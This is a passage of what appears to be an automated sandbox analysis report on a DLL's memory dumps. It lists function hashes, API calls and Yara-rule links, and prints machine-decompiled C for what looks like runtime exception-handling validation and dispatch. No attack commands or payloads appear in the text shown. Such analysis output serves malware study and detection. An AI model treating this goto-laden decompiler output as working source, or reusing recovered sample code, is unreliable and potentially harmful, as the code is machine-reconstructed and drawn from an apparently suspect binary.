                                • Instruction ID: b30d5385ea3ae64b036aaad3d38ba4bd831cc401ce30eea576912d618730ce7b
                                • Opcode Fuzzy Hash: 0fdf9d6de8286cd2b1aec4dbdbf1c33c30447d3a0964aa105c041d8c19639164
                                • Instruction Fuzzy Hash: 57F17071E01219DFDF14DFA8C8906ADF7B5FF88324F258269E919AB345D731AA01CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDC62C0, Relevance: 1.8, APIs: 1, Instructions: 274COMMON
                                Download Yara Rule
                                APIs
                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6DDC62BB,?,?,00000008,?,?,6DDC5E3E,00000000), ref: 6DDC64ED
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: ExceptionRaise
                                • String ID:
                                • API String ID: 3997070919-0
                                • Opcode ID: 24d28e547ee5afccdca66c6dcd4a5e2ff363d8dfa1a2ab6dfaf45d338007e64d
                                • Instruction ID: c25248b44a208b70bdb8d9619e9af5360b2fb6187906e64f4bd088b696cfc919
                                • Opcode Fuzzy Hash: 24d28e547ee5afccdca66c6dcd4a5e2ff363d8dfa1a2ab6dfaf45d338007e64d
                                • Instruction Fuzzy Hash: 0AB13731224609CFD705DF28C486B797BA4FF45364F258658F8A9CF2A6C335E992CB81
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD42485, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E6DD42485(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6dd441f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6dd44240 = 1;
										__eflags =  *0x6dd44240;
										if( *0x6dd44240 != 0) {
											goto L60;
										}
										_t84 =  *0x6dd441f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6dd44240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6dd441f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6dd44200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6dd441fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6dd44200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6dd44200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6dd44240 = 1;
							__eflags =  *0x6dd44240;
							if( *0x6dd44240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6dd44200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6dd44200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6dd44240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6dd44200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6dd441f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6dd44200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6dd44200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                0x6dd4248f
                                0x6dd42492
                                0x6dd42498
                                0x6dd424b6
                                0x00000000
                                0x6dd424b6
                                0x6dd424a0
                                0x6dd424a9
                                0x6dd424af
                                0x6dd424be
                                0x6dd424c1
                                0x6dd424c4
                                0x6dd424ce
                                0x6dd424ce
                                0x6dd424d0
                                0x6dd424d3
                                0x6dd424d5
                                0x6dd424d5
                                0x6dd424d7
                                0x6dd424da
                                0x00000000
                                0x00000000
                                0x6dd424dc
                                0x6dd424de
                                0x6dd42544
                                0x6dd42544
                                0x6dd426a2
                                0x00000000
                                0x6dd426a2
                                0x6dd424e0
                                0x6dd424e0
                                0x6dd424e4
                                0x6dd424e6
                                0x6dd424e6
                                0x6dd424e6
                                0x6dd424e6
                                0x6dd424e9
                                0x6dd424ea
                                0x6dd424ed
                                0x6dd424ed
                                0x6dd424f1
                                0x6dd424f5
                                0x6dd42503
                                0x6dd42503
                                0x6dd4250b
                                0x6dd42511
                                0x6dd42513
                                0x6dd42515
                                0x6dd42525
                                0x6dd42532
                                0x6dd42536
                                0x6dd4253b
                                0x6dd4253d
                                0x6dd425bb
                                0x6dd425bb
                                0x6dd4253f
                                0x6dd4253f
                                0x6dd4253f
                                0x6dd425bd
                                0x6dd425bf
                                0x6dd426a0
                                0x6dd426a0
                                0x00000000
                                0x6dd425c5
                                0x6dd425c5
                                0x6dd425cc
                                0x00000000
                                0x00000000
                                0x6dd425d2
                                0x6dd425d6
                                0x6dd42632
                                0x6dd42634
                                0x6dd4263c
                                0x6dd4263e
                                0x6dd42640
                                0x00000000
                                0x00000000
                                0x6dd42642
                                0x6dd42648
                                0x6dd4264a
                                0x6dd4264c
                                0x6dd42661
                                0x6dd42661
                                0x6dd42663
                                0x6dd42692
                                0x6dd42699
                                0x00000000
                                0x6dd42699
                                0x6dd42667
                                0x6dd42668
                                0x6dd4266a
                                0x6dd4266c
                                0x6dd4266c
                                0x6dd4266e
                                0x6dd42670
                                0x6dd42672
                                0x6dd42686
                                0x6dd42686
                                0x6dd42689
                                0x6dd4268b
                                0x6dd4268b
                                0x6dd4268c
                                0x6dd4268c
                                0x00000000
                                0x6dd42674
                                0x6dd42674
                                0x6dd42674
                                0x6dd4267d
                                0x6dd4267e
                                0x6dd42680
                                0x6dd42682
                                0x6dd42682
                                0x00000000
                                0x6dd42674
                                0x6dd42672
                                0x6dd4264e
                                0x6dd42655
                                0x6dd42655
                                0x6dd42657
                                0x00000000
                                0x00000000
                                0x6dd42659
                                0x6dd4265a
                                0x6dd4265d
                                0x6dd4265f
                                0x00000000
                                0x00000000
                                0x00000000
                                0x6dd4265f
                                0x00000000
                                0x6dd42655
                                0x6dd425d8
                                0x6dd425db
                                0x6dd425e0
                                0x00000000
                                0x00000000
                                0x6dd425e9
                                0x6dd425eb
                                0x6dd425f1
                                0x00000000
                                0x00000000
                                0x6dd425f7
                                0x6dd425fd
                                0x00000000
                                0x00000000
                                0x6dd42603
                                0x6dd42605
                                0x6dd4260e
                                0x6dd42612
                                0x00000000
                                0x00000000
                                0x6dd42618
                                0x6dd4261b
                                0x6dd4261d
                                0x00000000
                                0x00000000
                                0x6dd42624
                                0x6dd42626
                                0x00000000
                                0x00000000
                                0x6dd42628
                                0x6dd4262c
                                0x00000000
                                0x00000000
                                0x00000000
                                0x6dd4262c
                                0x00000000
                                0x00000000
                                0x00000000
                                0x6dd42517
                                0x6dd42517
                                0x6dd42517
                                0x6dd4251e
                                0x00000000
                                0x00000000
                                0x6dd42520
                                0x6dd42521
                                0x6dd42523
                                0x00000000
                                0x00000000
                                0x00000000
                                0x6dd42523
                                0x6dd4254b
                                0x6dd4254d
                                0x00000000
                                0x00000000
                                0x6dd4255d
                                0x6dd4255f
                                0x6dd42561
                                0x00000000
                                0x00000000
                                0x6dd42567
                                0x6dd4256e
                                0x6dd4259a
                                0x6dd4259a
                                0x6dd4259c
                                0x6dd4259e
                                0x6dd425b2
                                0x6dd425b4
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x6dd425a0
                                0x6dd425a0
                                0x6dd425a0
                                0x6dd425a9
                                0x6dd425aa
                                0x6dd425ac
                                0x6dd425ae
                                0x6dd425ae
                                0x00000000
                                0x6dd425a0
                                0x6dd42570
                                0x6dd42573
                                0x6dd42575
                                0x6dd42587
                                0x6dd42587
                                0x6dd4258a
                                0x6dd4258c
                                0x6dd4258c
                                0x6dd4258d
                                0x6dd4258d
                                0x6dd42593
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x6dd42577
                                0x6dd42577
                                0x6dd42577
                                0x6dd4257e
                                0x00000000
                                0x00000000
                                0x6dd42580
                                0x6dd42580
                                0x6dd42581
                                0x00000000
                                0x00000000
                                0x00000000
                                0x6dd42581
                                0x6dd42583
                                0x6dd42585
                                0x6dd42598
                                0x00000000
                                0x00000000
                                0x00000000
                                0x6dd42598
                                0x00000000
                                0x6dd42585
                                0x6dd424f7
                                0x6dd424fa
                                0x6dd424fd
                                0x00000000
                                0x00000000
                                0x6dd424ff
                                0x6dd42501
                                0x00000000
                                0x00000000
                                0x00000000
                                0x6dd42501
                                0x6dd424c6
                                0x6dd424c8
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6DD42536
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp Download File
                                Similarity
                                • API ID: MemoryQueryVirtual
                                • String ID:
                                • API String ID: 2850889275-0
                                • Opcode ID: 96b2f6015d97ff77d34982e80764f69f8f71b76aaa6884052c600f07282c0832
                                • Instruction ID: 0032f46ce0b36bae695d03626f0ffd86700c754ca246b352f3a2af5039e94a10
                                • Opcode Fuzzy Hash: 96b2f6015d97ff77d34982e80764f69f8f71b76aaa6884052c600f07282c0832
                                • Instruction Fuzzy Hash: A661D330604603CFEB25FF29D8A0B697BB5EB8A36CF24C069F555C7295E770D882CA50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD8EBB6, Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                Download Yara Rule
                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6DD8EBCC
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: FeaturePresentProcessor
                                • String ID:
                                • API String ID: 2325560087-0
                                • Opcode ID: 8399dbedc6643d5035f8911d2a09f0a3c5c09e8196cef12fa6ce23f63f88faa6
                                • Instruction ID: 3946e573d2b9afeb50d2385d38a0b35eabd3c08644cca2d69fd8248fe0e0da87
                                • Opcode Fuzzy Hash: 8399dbedc6643d5035f8911d2a09f0a3c5c09e8196cef12fa6ce23f63f88faa6
                                • Instruction Fuzzy Hash: 8051C4B1D0461ACFEB25DF98C9817AAB7F9FB45310F10852AE454E7246D376D900DF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDA917A, Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: 204e91fa5c05923e34111fde3f89cb4aadedbb72d814df838c61e1a58f82d811
                                • Instruction ID: fbf0982ccf0acf997ec7a5a9596f1bf8caa635251f8005cdff79544c9fd1c630
                                • Opcode Fuzzy Hash: 204e91fa5c05923e34111fde3f89cb4aadedbb72d814df838c61e1a58f82d811
                                • Instruction Fuzzy Hash: 7F61553164820AD7EB14BB28C890BBE73A5AF46304FCCC51AF992DB5C2D7639942C315
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDA8861, Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: a8260bac03ee4dfd0c900f68f53ac5e39c0acae119282dbe163888cfff0ffc0b
                                • Instruction ID: b4e30494064b8c5828042acff901283f28d587caede6b495dbe0dcc08b877b75
                                • Opcode Fuzzy Hash: a8260bac03ee4dfd0c900f68f53ac5e39c0acae119282dbe163888cfff0ffc0b
                                • Instruction Fuzzy Hash: E4516E316086CAD6DB25BB78C8907BEBB99AB42304F0CC51AFDC1DB2C2DB1599458367
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDA862F, Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: b8b6aa48bda707f2869db1882f7404d1c9cfba8873232cbf7aae36e10b2864e4
                                • Instruction ID: 5ffb572b916adc7fa560e0ba823e5a2f08671db88320e23009c6bbc48c080a2e
                                • Opcode Fuzzy Hash: b8b6aa48bda707f2869db1882f7404d1c9cfba8873232cbf7aae36e10b2864e4
                                • Instruction Fuzzy Hash: 3A519D706486CAD6EB25BB38C890BBE77A5AB02348F8CC51EFDC2DB282D711D945C751
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDA8AA2, Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: a509ba99d373decff709b22e6fca3f615ad7e4a2bc2872a165842f100db95bba
                                • Instruction ID: 072175daa479c1f26ed618e38ec021ff7d70b398e83ed1680b6565576641ed20
                                • Opcode Fuzzy Hash: a509ba99d373decff709b22e6fca3f615ad7e4a2bc2872a165842f100db95bba
                                • Instruction Fuzzy Hash: C6514EB06497CADADB257B28C8907BF77A9BB02304F0CC41BFD82D7282D716A945C765
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD9AB67, Relevance: .5, Instructions: 468COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: aef982abe2e2fe854ce0ccadbe68bcd8cb438b2fb4ed715b81cf3ac230f1b03f
                                • Instruction ID: 0fb4c952085c4b8e70577e54311618129228a46c59538dfb3e0cf1ce29f79522
                                • Opcode Fuzzy Hash: aef982abe2e2fe854ce0ccadbe68bcd8cb438b2fb4ed715b81cf3ac230f1b03f
                                • Instruction Fuzzy Hash: 70027172E00225DFDB26DF18CC80BAAB7F9BF46304F0550EAE959EB245D7319A818F51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD9E050, Relevance: .4, Instructions: 375COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e74aa3320ab272d860531c0462d2b1e210bc55940e259d0d69b6b34226ca01fe
                                • Instruction ID: 9746df04206f90b9396f2613e31b795f0bc9eb72ac4a3a692cce5521595ace40
                                • Opcode Fuzzy Hash: e74aa3320ab272d860531c0462d2b1e210bc55940e259d0d69b6b34226ca01fe
                                • Instruction Fuzzy Hash: DCE1B671A01229DFDB25EF58CC80BAAB7B8FF46304F0441E9E949EB245D7319E808F91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD9DC20, Relevance: .3, Instructions: 259COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ea0471af2724854eadb6ab7024eb6c73c22b1225586173b8329e02d7ba345dd8
                                • Instruction ID: 045ff46d973ea13be4a89d913ad89cdf20125e4095e46a21d036e4ca55e88c8c
                                • Opcode Fuzzy Hash: ea0471af2724854eadb6ab7024eb6c73c22b1225586173b8329e02d7ba345dd8
                                • Instruction Fuzzy Hash: F1918D71A002698BDB25EF58C880BEDB7B5FFC9304F1540EAE909EB245E7719E418F90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD9B617, Relevance: .2, Instructions: 159COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dd16bbd6c326d4e8212feb0afa906c0b57185bc48de0426693217f9c8ca3e5cb
                                • Instruction ID: e9927c3b657bc7b77e53ead2d0e920f5885610cc82a6e2943224e3ab3d38b4f6
                                • Opcode Fuzzy Hash: dd16bbd6c326d4e8212feb0afa906c0b57185bc48de0426693217f9c8ca3e5cb
                                • Instruction Fuzzy Hash: C8518171E00219EFDF04DF99C990AEEBBB2FF88304F1A8159E515AF241C735AA51CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDB8CB7, Relevance: .1, Instructions: 104COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1310b8fd10497e5dfeeaeff4178988b853285d99a9bd4cf6c9598b8bba0169bd
                                • Instruction ID: 1e647d41219ee0ac73f7438c7e4cd28424ce59e9c7dbbf2045ea59774fd7f94a
                                • Opcode Fuzzy Hash: 1310b8fd10497e5dfeeaeff4178988b853285d99a9bd4cf6c9598b8bba0169bd
                                • Instruction Fuzzy Hash: 0321B373F204394B7B0CC47E8C522BDB6E1C68C511745823AF9A6EA2C1D968D917E2E4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDB8B97, Relevance: .1, Instructions: 81COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 24156c0ab310ec2f201cffc2243c3d5f88f5dcdb67a6c6aa581c9051b3307511
                                • Instruction ID: a354028196bac8cb050342d1b69097f4c036b68ea23169a6feb71ed225857e82
                                • Opcode Fuzzy Hash: 24156c0ab310ec2f201cffc2243c3d5f88f5dcdb67a6c6aa581c9051b3307511
                                • Instruction Fuzzy Hash: 1111A763F30C255A675C81BD8C1326A96D2EBD825070F433AD826E7284E9A4DE23D290
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD42264, Relevance: .1, Instructions: 77COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 71%
                                			E6DD42264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6DD423CB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6DD42485(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6DD42370(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6DD423CB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6DD42467(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                0x6dd42268
                                0x6dd42269
                                0x6dd4226a
                                0x6dd4226d
                                0x6dd4226f
                                0x6dd42272
                                0x6dd42273
                                0x6dd42275
                                0x6dd42276
                                0x6dd42277
                                0x6dd4227a
                                0x6dd42284
                                0x6dd42335
                                0x6dd4233c
                                0x6dd42345
                                0x6dd4228a
                                0x6dd4228a
                                0x6dd42290
                                0x6dd42296
                                0x6dd42299
                                0x6dd4229c
                                0x6dd422a0
                                0x6dd422a5
                                0x6dd422aa
                                0x6dd4232a
                                0x00000000
                                0x6dd422ac
                                0x6dd422ac
                                0x6dd422b8
                                0x6dd422ba
                                0x6dd42315
                                0x6dd42315
                                0x6dd4231b
                                0x00000000
                                0x6dd422bc
                                0x6dd422cb
                                0x6dd422cd
                                0x6dd422ce
                                0x6dd422cf
                                0x6dd422d2
                                0x6dd422d2
                                0x6dd422d4
                                0x00000000
                                0x6dd422d6
                                0x6dd422d6
                                0x6dd42320
                                0x6dd422d8
                                0x6dd422d8
                                0x6dd422dc
                                0x6dd422e4
                                0x6dd422e9
                                0x6dd422ee
                                0x6dd422fa
                                0x6dd42302
                                0x6dd42309
                                0x6dd4230f
                                0x6dd42313
                                0x00000000
                                0x6dd42313
                                0x6dd422d6
                                0x6dd422d4
                                0x00000000
                                0x6dd422ba
                                0x6dd4232e
                                0x6dd4232e
                                0x6dd4232e
                                0x6dd422aa
                                0x6dd4234a
                                0x6dd42351

                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                • Instruction ID: 895f8273d696002984db49311f8f91de53d6c45458b51953299b18e89e499622
                                • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                • Instruction Fuzzy Hash: 4B2195329042059BCB10EF68C8949A7BBB5FF49354B46C198E955DB246D730F915C7E0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDCE337, Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.495143690.000000006DDCE000.00000040.00020000.sdmp, Offset: 6DDCE000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                • Instruction ID: 38b4bb7381aacd2ba55ac5c9a731970e50bbbfe75c3b277459d51fd8e1d01bcb
                                • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
